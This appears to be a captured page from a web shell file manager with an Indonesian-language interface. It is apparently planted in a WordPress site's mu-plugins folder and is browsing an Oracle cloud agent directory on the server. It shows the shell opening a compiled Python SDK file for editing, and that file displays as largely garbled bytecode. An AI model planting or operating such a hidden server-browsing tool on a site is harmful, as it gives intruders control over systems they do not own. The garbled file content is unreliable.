📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
nosql
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/nosql/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: table_collection.pyc
a O��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Z dd� ZdS )�TableCollectionz Results of ListTables. c K sF dddddd�| _ dddddd�| _d | _d | _d | _d | _d | _d S ) ab Initializes a new TableCollection object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param items: The value to assign to the items property of this TableCollection. :type items: list[oci.nosql.models.TableSummary] :param max_auto_reclaimable_tables: The value to assign to the max_auto_reclaimable_tables property of this TableCollection. :type max_auto_reclaimable_tables: int :param auto_reclaimable_tables: The value to assign to the auto_reclaimable_tables property of this TableCollection. :type auto_reclaimable_tables: int :param on_demand_capacity_tables: The value to assign to the on_demand_capacity_tables property of this TableCollection. :type on_demand_capacity_tables: int :param max_on_demand_capacity_tables: The value to assign to the max_on_demand_capacity_tables property of this TableCollection. :type max_on_demand_capacity_tables: int zlist[TableSummary]�int)�items�max_auto_reclaimable_tables�auto_reclaimable_tables�on_demand_capacity_tables�max_on_demand_capacity_tablesr �maxAutoReclaimableTables�autoReclaimableTables�onDemandCapacityTables�maxOnDemandCapacityTablesN)� swagger_types� attribute_map�_items�_max_auto_reclaimable_tables�_auto_reclaimable_tables�_on_demand_capacity_tables�_max_on_demand_capacity_tables)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/nosql/models/table_collection.py�__init__ s"